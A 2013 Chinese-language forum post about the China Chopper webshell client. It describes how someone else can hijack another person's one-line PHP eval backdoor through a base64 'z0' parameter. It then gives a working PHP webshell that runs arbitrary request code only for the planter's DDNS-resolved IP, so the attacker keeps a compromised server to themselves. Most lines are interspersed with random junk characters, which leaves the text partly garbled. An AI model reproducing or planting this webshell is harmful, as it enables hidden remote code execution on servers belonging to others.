今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞* b! R& p- ?3 t6 b% k$ O
& f- L6 |2 k2 N& s- t5 H就算你设置了密码,使用了eval($_REQUEST['moyo']);
7 f$ d e G& ?' o1 h( O9 j
: ~. z3 A( m, c Y% t但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门1 |. F( ?4 A' J$ `! V ]8 z
( @7 h4 w5 j8 S( t( f6 d0 s7 @因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
, Q& M- X& p. u6 g3 n
& b6 S: f$ e6 f+ J( e直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了1 ~: S, A7 D0 B, R x9 E' y
# q4 E( ?- @& D" e* }) a不知道是设计缺陷还是故意留的后门: _0 `' ~+ P! X5 e$ R5 U* r
2 Q4 A/ `1 @" ]' V3 K
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
# H& x* _+ v" H! n# |. y5 x. `; s; Z
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org8 l- z; y7 g, m& K4 E6 }7 d
2 A% Q. }% i; n+ [2 @, b' k, U然后一句话后门这样写( L3 q4 \+ ^) d! L$ i
2 R: c- n8 r$ v. O: h+ k% ~/ {<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>3 D3 R% u0 P' C* m# W1 Q
这样就可以让一句话后门只允许自己的电脑连接了' @9 Y( e- {8 b8 Y
4 s% l* l6 J k2 r( j: E. J* g
|
发表于 2013-7-26 12:45:48
收藏
支持
反对